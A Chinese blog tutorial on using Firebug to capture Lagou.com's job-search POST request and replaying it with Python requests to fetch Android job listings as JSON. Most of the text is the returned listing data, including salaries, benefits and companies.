社交网络","score":1343,"district":null,"companyLabelList":["绩效奖金","年终分红","五险一金","通讯津贴"],"deliverCount":1,"leaderName":"王强宇","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":28,"imstate":"today","createTimeSort":1462859387000,"positonTypesMap":null,"hrScore":68,"flowScore":178,"showCount":652,"pvScore":32.82081357576065,"plus":"否","businessZones":null,"publisherId":4362468,"loginTime":1462870318000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"13:49发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 13:55:08","companyId":28422,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"成都品果科技有限公司","city":"北京","salary":"18k-30k","financeStage":"成长型(B轮)","positionId":290875,"companyLogo":"i/image/M00/02/F3/Cgp3O1ah7FuAbSnkAACMlcPiWXk393.png","positionFirstType":"技术","companyName":"camera360","positionAdvantage":"高大上的福利待遇、发展前景等着你哦!","industryField":"移动互联网","score":1339,"district":"海淀区","companyLabelList":["年终分红","绩效奖金","年底双薪","五险一金"],"deliverCount":6,"leaderName":"徐灏","companySize":"15-50人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":0,"imstate":"disabled","createTimeSort":1462859708000,"positonTypesMap":null,"hrScore":80,"flowScore":188,"showCount":1199,"pvScore":19.745453118211834,"plus":"是","businessZones":["中关村","北京大学","苏州街"],"publisherId":389753,"loginTime":1462866640000,"appShow":0,"calcScore":false,"showOrder":1433137697136,"haveDeliver":false,"orderBy":71,"adWord":0,"formatCreateTime":"13:55发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 17:57:55","companyId":89004,"positionName":"Android","positionType":"移动开发","workYear":"不限","education":"学历不限","jobNature":"全职","companyShortName":"温州康宁医院股份有限公司","city":"杭州","salary":"10k-20k","financeStage":"上市公司","positionId":1410975,"companyLogo":"i/image/M00/02/C2/CgqKkVabp--APWTjAACHHJJxyPc207.png","positionFirstType":"技术","companyName":"的的心理","positionAdvantage":"上市公司内部创业团队","industryField":"移动互联网 · 医疗健康","score":1335,"district":null,"companyLabelList":["年底双薪","股票期权","带薪年假","招募合伙人"],"deliverCount":9,"leaderName":"杨怡","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462874275000,"positonTypesMap":null,"hrScore":74,"flowScore":144,"showCount":2085,"pvScore":77.9570832081189,"plus":"是","businessZones":null,"publisherId":3655492,"loginTime":1462873104000,"appShow":711,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"17:57发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-09 09:46:32","companyId":113895,"positionName":"Android开发工程师","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"北京互动金服科技有限公司","city":"北京","salary":"15k-25k","financeStage":"成长型(不需要融资)","positionId":1473342,"companyLogo":"i/image/M00/03/D8/CgqKkVbEA_uAe1k4AAHTfy3RxPY812.jpg","positionFirstType":"技术","companyName":"互动科技","positionAdvantage":"五险一金 补充医疗 年终奖 福利津贴","industryField":"移动互联网 · O2O","score":1326,"district":"海淀区","companyLabelList":,"deliverCount":32,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":980,"adjustScore":48,"imstate":"today","createTimeSort":1462758392000,"positonTypesMap":null,"hrScore":82,"flowScore":153,"showCount":3741,"pvScore":67.01698353391613,"plus":"是","businessZones":["白石桥","魏公村","万寿寺","白石桥","魏公村","万寿寺"],"publisherId":3814477,"loginTime":1462874842000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"1天前发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 16:50:51","companyId":23999,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"本科","jobNature":"全职","companyShortName":"南京智鹤电子科技有限公司","city":"长沙","salary":"8k-12k","financeStage":"成长型(A轮)","positionId":1804917,"companyLogo":"image1/M00/35/EB/CgYXBlWc5KGAVeL8AAAOi4lPhWU502.jpg","positionFirstType":"技术","companyName":"智鹤科技","positionAdvantage":"弹性工作制 技术氛围浓厚","industryField":"移动互联网","score":1322,"district":null,"companyLabelList":["股票期权","绩效奖金","专项奖金","年终分红"],"deliverCount":1,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":0,"imstate":"disabled","createTimeSort":1462870251000,"positonTypesMap":null,"hrScore":62,"flowScore":191,"showCount":283,"pvScore":15.939035855045429,"plus":"否","businessZones":null,"publisherId":282621,"loginTime":1462869967000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"16:50发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-08 23:12:56","companyId":24287,"positionName":"android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"杭州腾展科技有限公司","city":"杭州","salary":"15k-22k","financeStage":"成熟型(D轮及以上)","positionId":1197868,"companyLogo":"image1/M00/0B/7D/Cgo8PFTzIBOAEd2dAACMq9tQoMA797.png","positionFirstType":"技术","companyName":"腾展叮咚(Dingtone)","positionAdvantage":"每半年调整薪资,今年上市!","industryField":"移动互联网 · 社交网络","score":1322,"district":"西湖区","companyLabelList":["出国旅游","股票期权","精英团队","强悍的创始人"],"deliverCount":9,"leaderName":"魏松祥(Steve Wei)","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"disabled","createTimeSort":1462720376000,"positonTypesMap":null,"hrScore":71,"flowScore":137,"showCount":3786,"pvScore":87.51582865460942,"plus":"是","businessZones":["文三路","古荡","高新文教区"],"publisherId":2946659,"loginTime":1462891920000,"appShow":940,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":66,"adWord":0,"formatCreateTime":"2天前发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:38:43","companyId":19875,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"维沃移动通信有限公司","city":"南京","salary":"12k-24k","financeStage":"初创型(未融资)","positionId":938099,"companyLogo":"image1/M00/00/25/Cgo8PFTUWH-Ab57wAABKOdLbNuw116.png","positionFirstType":"技术","companyName":"vivo","positionAdvantage":"vivo,追求极致","industryField":"移动互联网","score":1320,"district":"建邺区","companyLabelList":["年终分红","五险一金","带薪年假","年度旅游"],"deliverCount":4,"leaderName":"暂没有填写","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462844323000,"positonTypesMap":null,"hrScore":57,"flowScore":149,"showCount":981,"pvScore":72.14107985481958,"plus":"是","businessZones":["沙洲","小行","赛虹桥"],"publisherId":302876,"loginTime":1462871424000,"appShow":353,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":66,"adWord":0,"formatCreateTime":"09:38发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:49:59","companyId":20473,"positionName":"安卓开发工程师","positionType":"移动开发","workYear":"3-5年","education":"大专","jobNature":"全职","companyShortName":"广州棒谷网络科技有限公司","city":"广州","salary":"8k-15k","financeStage":"成长型(A轮)","positionId":1733545,"companyLogo":"image1/M00/0F/36/Cgo8PFT9AgGAciySAAA1THfEIAE433.jpg","positionFirstType":"技术","companyName":"广州棒谷网络科技有限公司","positionAdvantage":"五险一金 大平台 带薪休假","industryField":"电子商务","score":1320,"district":null,"companyLabelList":["项目奖金","绩效奖金","年终奖","五险一金"],"deliverCount":15,"leaderName":"大邹","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":980,"adjustScore":48,"imstate":"today","createTimeSort":1462844999000,"positonTypesMap":null,"hrScore":79,"flowScore":144,"showCount":3943,"pvScore":77.78928844199473,"plus":"是","businessZones":null,"publisherId":235413,"loginTime":1462878251000,"appShow":1562,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"09:49发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-04 11:41:59","companyId":87117,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"本科","jobNature":"全职","companyShortName":"南京信通科技有限责任公司","city":"南京","salary":"10k-12k","financeStage":"成长型(不需要融资)","positionId":966059,"companyLogo":"image1/M00/3F/51/CgYXBlXASfuADyOsAAA_na14zho635.jpg?cc=0.6724986131303012","positionFirstType":"技术","companyName":"联创集团信通科技","positionAdvantage":"提供完善的福利和薪酬晋升制度","industryField":"移动互联网 · 教育","score":1320,"district":"鼓楼区","companyLabelList":["节日礼物","带薪年假","补充医保","补充子女医保"],"deliverCount":4,"leaderName":"暂没有填写","companySize":"150-500人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462333319000,"positonTypesMap":null,"hrScore":88,"flowScore":143,"showCount":3161,"pvScore":79.41660570401937,"plus":"是","businessZones":["虎踞路","龙江","西桥"],"publisherId":2230973,"loginTime":1462871511000,"appShow":711,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":41,"adWord":0,"formatCreateTime":"2016-05-04","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:26:58","companyId":103051,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"大专","jobNature":"全职","companyShortName":"浙江米果网络股份有限公司","city":"杭州","salary":"12k-22k","financeStage":"成长型(A轮)","positionId":1233873,"companyLogo":"image2/M00/10/DF/CgqLKVYwKQSAR2p4AAJAM590SJM137.png?cc=0.17502541467547417","positionFirstType":"技术","companyName":"米果小站","positionAdvantage":"充分的发展成长空间","industryField":"移动互联网","score":1320,"district":"滨江区","companyLabelList":["年底双薪","股票期权","午餐补助","五险一金"],"deliverCount":5,"leaderName":"暂没有填写","companySize":"150-500人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"disabled","createTimeSort":1462843618000,"positonTypesMap":null,"hrScore":72,"flowScore":137,"showCount":1582,"pvScore":87.93158026917071,"plus":"是","businessZones":["江南","长河","西兴"],"publisherId":2992735,"loginTime":1462889479000,"appShow":312,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"09:26发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 10:01:39","companyId":70044,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"大专","jobNature":"全职","companyShortName":"武汉平行世界网络科技有限公司","city":"武汉","salary":"9k-13k","financeStage":"初创型(天使轮)","positionId":664813,"companyLogo":"image2/M00/00/3E/CgqLKVXdccSAQE91AACv-6V33Vo860.jpg","positionFirstType":"技术","companyName":"平行世界","positionAdvantage":"弹性工作、带薪年假、待遇优厚、3号线直达","industryField":"电子商务 · 文化娱乐","score":1320,"district":"蔡甸区","companyLabelList":["年底双薪","待遇优厚","专项奖金","带薪年假"],"deliverCount":18,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462845699000,"positonTypesMap":null,"hrScore":76,"flowScore":128,"showCount":1934,"pvScore":99.6001810598155,"plus":"是","businessZones":["沌口"],"publisherId":1694134,"loginTime":1462892151000,"appShow":759,"calcScore":false,"showOrder":1433141412915,"haveDeliver":false,"orderBy":68,"adWord":0,"formatCreateTime":"10:01发布","totalCount":0,"searchScore":0.0}]}}}












在XHR中点击JSON,就可以看到浏览器返回来的数据了。 是不是跟上面使用python程序抓取的一样呢?
 





 
是不是很简单?
 
如果想获得第2页,第3页的数据呢?
 
只需要修改pn=x 中的值就可以了。post_data = {'first':'true','kd':'Android','pn':'2'} #获取第2页的内容
如果想要获取全部内容,写一个循环语句就可以了。
 
版权所有,转载请说明出处:www.30daydo.com
  查看全部
针对一些JS网页,动态网页在源码中无法看到它的内容,可以通过抓包分析出其JSON格式的数据。 网页通过通过这些JSON数据对网页的内容进行填充,然后就看到网页里显示相关的内容了。
 
使用过chrome,firefox,wireshark来抓过包,比较方便的是chrome,不需要安装第三方的其它插件,不过打开新页面的时候又要重新开一个捕捉页面,会错过一些实时的数据。 
 
wireshark需要专门掌握它自己的过滤规则,学习成本摆在那里。 
 
最好用的还是firefox+firebug第三方插件。
 
接下来以拉勾网为例。
 
打开firebug功能
 
www.lagou.com 在左侧栏随便点击一个岗位,以android为例 
 

Android招聘-招聘求职信息-拉勾网.png

 
在firebug中,需要点击“网络”选项卡,然后选择XHR。
 

post.jpg

 
Post的信息就是我们需要关注的,点击post的链接
 

post_data.jpg

 
点击了Android之后 我们从浏览器上传了几个参数到拉勾的服务器
一个是 first =true, 一个是kd = android, (关键字) 一个是pn =1 (page number 页码)
 
所以我们就可以模仿这一个步骤来构造一个数据包来模拟用户的点击动作。
post_data = {'first':'true','kd':'Android','pn':'1'}

然后使用python中库中最简单的requests库来提交数据。 而这些数据 正是抓包里看到的数据。
import requests

url = "http://www.lagou.com/jobs/posi ... ot%3B
return_data=requests.post(url,data=post_data)
print return_data.text


呐,打印出来的数据就是返回来的json数据
{"code":0,"success":true,"requestId":null,"resubmitToken":null,"msg":null,"content":{"pageNo":1,"pageSize":15,"positionResult":{"totalCount":5000,"pageSize":15,"locationInfo":{"city":null,"district":null,"businessZone":null},"result":[{"createTime":"2016-05-05 17:27:50","companyId":50889,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"和创(北京)科技股份有限公司","city":"北京","salary":"20k-35k","financeStage":"上市公司","positionId":1455217,"companyLogo":"i/image/M00/03/44/Cgp3O1ax7JWAOSzUAABS3OF0A7w289.jpg","positionFirstType":"技术","companyName":"和创科技(红圈营销)","positionAdvantage":"上市公司,持续股权激励政策,技术极客云集","industryField":"移动互联网 · 企业服务","score":1372,"district":"西城区","companyLabelList":["弹性工作","敏捷研发","股票期权","年底双薪"],"deliverCount":13,"leaderName":"刘学臣","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462440470000,"positonTypesMap":null,"hrScore":77,"flowScore":148,"showCount":6627,"pvScore":73.2258060280967,"plus":"是","businessZones":["新街口","德胜门","小西天"],"publisherId":994817,"loginTime":1462876049000,"appShow":3141,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":99,"adWord":1,"formatCreateTime":"2016-05-05","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-05 18:30:16","companyId":50889,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"和创(北京)科技股份有限公司","city":"北京","salary":"20k-35k","financeStage":"上市公司","positionId":1440576,"companyLogo":"i/image/M00/03/44/Cgp3O1ax7JWAOSzUAABS3OF0A7w289.jpg","positionFirstType":"技术","companyName":"和创科技(红圈营销)","positionAdvantage":"上市公司,持续股权激励政策,技术爆棚!","industryField":"移动互联网 · 企业服务","score":1372,"district":"海淀区","companyLabelList":["弹性工作","敏捷研发","股票期权","年底双薪"],"deliverCount":6,"leaderName":"刘学臣","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462444216000,"positonTypesMap":null,"hrScore":77,"flowScore":148,"showCount":3214,"pvScore":73.37271526202157,"plus":"是","businessZones":["双榆树","中关村","大钟寺"],"publisherId":994817,"loginTime":1462876049000,"appShow":1782,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":99,"adWord":1,"formatCreateTime":"2016-05-05","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 18:41:29","companyId":94307,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"宁波海大物联科技有限公司","city":"宁波","salary":"8k-15k","financeStage":"成长型(A轮)","positionId":1070249,"companyLogo":"image2/M00/03/32/CgqLKVXtWiuAUbXgAAB1g_5FW3Y484.png?cc=0.6152940313331783","positionFirstType":"技术","companyName":"海大物联","positionAdvantage":"一流的技术团队,丰厚的薪资回报。","industryField":"移动互联网 · 企业服务","score":1353,"district":"鄞州区","companyLabelList":["节日礼物","年底双薪","带薪年假","年度旅游"],"deliverCount":0,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462876889000,"positonTypesMap":null,"hrScore":75,"flowScore":167,"showCount":1031,"pvScore":47.6349840620252,"plus":"是","businessZones":null,"publisherId":2494230,"loginTime":1462885305000,"appShow":184,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"18:41发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 17:57:43","companyId":89004,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"学历不限","jobNature":"全职","companyShortName":"温州康宁医院股份有限公司","city":"杭州","salary":"10k-20k","financeStage":"上市公司","positionId":1387825,"companyLogo":"i/image/M00/02/C2/CgqKkVabp--APWTjAACHHJJxyPc207.png","positionFirstType":"技术","companyName":"的的心理","positionAdvantage":"上市公司内部创业项目。优质福利待遇+期权","industryField":"移动互联网 · 医疗健康","score":1344,"district":"江干区","companyLabelList":["年底双薪","股票期权","带薪年假","招募合伙人"],"deliverCount":5,"leaderName":"杨怡","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462874263000,"positonTypesMap":null,"hrScore":74,"flowScore":153,"showCount":1312,"pvScore":66.87818057124453,"plus":"是","businessZones":["四季青","景芳"],"publisherId":3655492,"loginTime":1462873104000,"appShow":573,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"17:57发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 13:49:47","companyId":15071,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"杭州短趣网络传媒技术有限公司","city":"杭州","salary":"10k-20k","financeStage":"成长型(A轮)","positionId":1803257,"companyLogo":"image2/M00/0B/80/CgpzWlYYse2AJgc0AABG9iSEWAE052.jpg","positionFirstType":"技术","companyName":"短趣网","positionAdvantage":"高额项目奖金,行业内有竞争力的薪资水平","industryField":"移动互联网 · 社交网络","score":1343,"district":null,"companyLabelList":["绩效奖金","年终分红","五险一金","通讯津贴"],"deliverCount":1,"leaderName":"王强宇","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":28,"imstate":"today","createTimeSort":1462859387000,"positonTypesMap":null,"hrScore":68,"flowScore":178,"showCount":652,"pvScore":32.82081357576065,"plus":"否","businessZones":null,"publisherId":4362468,"loginTime":1462870318000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"13:49发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 13:55:08","companyId":28422,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"成都品果科技有限公司","city":"北京","salary":"18k-30k","financeStage":"成长型(B轮)","positionId":290875,"companyLogo":"i/image/M00/02/F3/Cgp3O1ah7FuAbSnkAACMlcPiWXk393.png","positionFirstType":"技术","companyName":"camera360","positionAdvantage":"高大上的福利待遇、发展前景等着你哦!","industryField":"移动互联网","score":1339,"district":"海淀区","companyLabelList":["年终分红","绩效奖金","年底双薪","五险一金"],"deliverCount":6,"leaderName":"徐灏","companySize":"15-50人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":0,"imstate":"disabled","createTimeSort":1462859708000,"positonTypesMap":null,"hrScore":80,"flowScore":188,"showCount":1199,"pvScore":19.745453118211834,"plus":"是","businessZones":["中关村","北京大学","苏州街"],"publisherId":389753,"loginTime":1462866640000,"appShow":0,"calcScore":false,"showOrder":1433137697136,"haveDeliver":false,"orderBy":71,"adWord":0,"formatCreateTime":"13:55发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 17:57:55","companyId":89004,"positionName":"Android","positionType":"移动开发","workYear":"不限","education":"学历不限","jobNature":"全职","companyShortName":"温州康宁医院股份有限公司","city":"杭州","salary":"10k-20k","financeStage":"上市公司","positionId":1410975,"companyLogo":"i/image/M00/02/C2/CgqKkVabp--APWTjAACHHJJxyPc207.png","positionFirstType":"技术","companyName":"的的心理","positionAdvantage":"上市公司内部创业团队","industryField":"移动互联网 · 医疗健康","score":1335,"district":null,"companyLabelList":["年底双薪","股票期权","带薪年假","招募合伙人"],"deliverCount":9,"leaderName":"杨怡","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462874275000,"positonTypesMap":null,"hrScore":74,"flowScore":144,"showCount":2085,"pvScore":77.9570832081189,"plus":"是","businessZones":null,"publisherId":3655492,"loginTime":1462873104000,"appShow":711,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"17:57发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-09 09:46:32","companyId":113895,"positionName":"Android开发工程师","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"北京互动金服科技有限公司","city":"北京","salary":"15k-25k","financeStage":"成长型(不需要融资)","positionId":1473342,"companyLogo":"i/image/M00/03/D8/CgqKkVbEA_uAe1k4AAHTfy3RxPY812.jpg","positionFirstType":"技术","companyName":"互动科技","positionAdvantage":"五险一金 补充医疗 年终奖 福利津贴","industryField":"移动互联网 · O2O","score":1326,"district":"海淀区","companyLabelList":,"deliverCount":32,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":980,"adjustScore":48,"imstate":"today","createTimeSort":1462758392000,"positonTypesMap":null,"hrScore":82,"flowScore":153,"showCount":3741,"pvScore":67.01698353391613,"plus":"是","businessZones":["白石桥","魏公村","万寿寺","白石桥","魏公村","万寿寺"],"publisherId":3814477,"loginTime":1462874842000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"1天前发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 16:50:51","companyId":23999,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"本科","jobNature":"全职","companyShortName":"南京智鹤电子科技有限公司","city":"长沙","salary":"8k-12k","financeStage":"成长型(A轮)","positionId":1804917,"companyLogo":"image1/M00/35/EB/CgYXBlWc5KGAVeL8AAAOi4lPhWU502.jpg","positionFirstType":"技术","companyName":"智鹤科技","positionAdvantage":"弹性工作制 技术氛围浓厚","industryField":"移动互联网","score":1322,"district":null,"companyLabelList":["股票期权","绩效奖金","专项奖金","年终分红"],"deliverCount":1,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":0,"imstate":"disabled","createTimeSort":1462870251000,"positonTypesMap":null,"hrScore":62,"flowScore":191,"showCount":283,"pvScore":15.939035855045429,"plus":"否","businessZones":null,"publisherId":282621,"loginTime":1462869967000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"16:50发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-08 23:12:56","companyId":24287,"positionName":"android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"杭州腾展科技有限公司","city":"杭州","salary":"15k-22k","financeStage":"成熟型(D轮及以上)","positionId":1197868,"companyLogo":"image1/M00/0B/7D/Cgo8PFTzIBOAEd2dAACMq9tQoMA797.png","positionFirstType":"技术","companyName":"腾展叮咚(Dingtone)","positionAdvantage":"每半年调整薪资,今年上市!","industryField":"移动互联网 · 社交网络","score":1322,"district":"西湖区","companyLabelList":["出国旅游","股票期权","精英团队","强悍的创始人"],"deliverCount":9,"leaderName":"魏松祥(Steve Wei)","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"disabled","createTimeSort":1462720376000,"positonTypesMap":null,"hrScore":71,"flowScore":137,"showCount":3786,"pvScore":87.51582865460942,"plus":"是","businessZones":["文三路","古荡","高新文教区"],"publisherId":2946659,"loginTime":1462891920000,"appShow":940,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":66,"adWord":0,"formatCreateTime":"2天前发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:38:43","companyId":19875,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"维沃移动通信有限公司","city":"南京","salary":"12k-24k","financeStage":"初创型(未融资)","positionId":938099,"companyLogo":"image1/M00/00/25/Cgo8PFTUWH-Ab57wAABKOdLbNuw116.png","positionFirstType":"技术","companyName":"vivo","positionAdvantage":"vivo,追求极致","industryField":"移动互联网","score":1320,"district":"建邺区","companyLabelList":["年终分红","五险一金","带薪年假","年度旅游"],"deliverCount":4,"leaderName":"暂没有填写","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462844323000,"positonTypesMap":null,"hrScore":57,"flowScore":149,"showCount":981,"pvScore":72.14107985481958,"plus":"是","businessZones":["沙洲","小行","赛虹桥"],"publisherId":302876,"loginTime":1462871424000,"appShow":353,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":66,"adWord":0,"formatCreateTime":"09:38发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:49:59","companyId":20473,"positionName":"安卓开发工程师","positionType":"移动开发","workYear":"3-5年","education":"大专","jobNature":"全职","companyShortName":"广州棒谷网络科技有限公司","city":"广州","salary":"8k-15k","financeStage":"成长型(A轮)","positionId":1733545,"companyLogo":"image1/M00/0F/36/Cgo8PFT9AgGAciySAAA1THfEIAE433.jpg","positionFirstType":"技术","companyName":"广州棒谷网络科技有限公司","positionAdvantage":"五险一金 大平台 带薪休假","industryField":"电子商务","score":1320,"district":null,"companyLabelList":["项目奖金","绩效奖金","年终奖","五险一金"],"deliverCount":15,"leaderName":"大邹","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":980,"adjustScore":48,"imstate":"today","createTimeSort":1462844999000,"positonTypesMap":null,"hrScore":79,"flowScore":144,"showCount":3943,"pvScore":77.78928844199473,"plus":"是","businessZones":null,"publisherId":235413,"loginTime":1462878251000,"appShow":1562,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"09:49发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-04 11:41:59","companyId":87117,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"本科","jobNature":"全职","companyShortName":"南京信通科技有限责任公司","city":"南京","salary":"10k-12k","financeStage":"成长型(不需要融资)","positionId":966059,"companyLogo":"image1/M00/3F/51/CgYXBlXASfuADyOsAAA_na14zho635.jpg?cc=0.6724986131303012","positionFirstType":"技术","companyName":"联创集团信通科技","positionAdvantage":"提供完善的福利和薪酬晋升制度","industryField":"移动互联网 · 教育","score":1320,"district":"鼓楼区","companyLabelList":["节日礼物","带薪年假","补充医保","补充子女医保"],"deliverCount":4,"leaderName":"暂没有填写","companySize":"150-500人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462333319000,"positonTypesMap":null,"hrScore":88,"flowScore":143,"showCount":3161,"pvScore":79.41660570401937,"plus":"是","businessZones":["虎踞路","龙江","西桥"],"publisherId":2230973,"loginTime":1462871511000,"appShow":711,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":41,"adWord":0,"formatCreateTime":"2016-05-04","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:26:58","companyId":103051,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"大专","jobNature":"全职","companyShortName":"浙江米果网络股份有限公司","city":"杭州","salary":"12k-22k","financeStage":"成长型(A轮)","positionId":1233873,"companyLogo":"image2/M00/10/DF/CgqLKVYwKQSAR2p4AAJAM590SJM137.png?cc=0.17502541467547417","positionFirstType":"技术","companyName":"米果小站","positionAdvantage":"充分的发展成长空间","industryField":"移动互联网","score":1320,"district":"滨江区","companyLabelList":["年底双薪","股票期权","午餐补助","五险一金"],"deliverCount":5,"leaderName":"暂没有填写","companySize":"150-500人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"disabled","createTimeSort":1462843618000,"positonTypesMap":null,"hrScore":72,"flowScore":137,"showCount":1582,"pvScore":87.93158026917071,"plus":"是","businessZones":["江南","长河","西兴"],"publisherId":2992735,"loginTime":1462889479000,"appShow":312,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"09:26发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 10:01:39","companyId":70044,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"大专","jobNature":"全职","companyShortName":"武汉平行世界网络科技有限公司","city":"武汉","salary":"9k-13k","financeStage":"初创型(天使轮)","positionId":664813,"companyLogo":"image2/M00/00/3E/CgqLKVXdccSAQE91AACv-6V33Vo860.jpg","positionFirstType":"技术","companyName":"平行世界","positionAdvantage":"弹性工作、带薪年假、待遇优厚、3号线直达","industryField":"电子商务 · 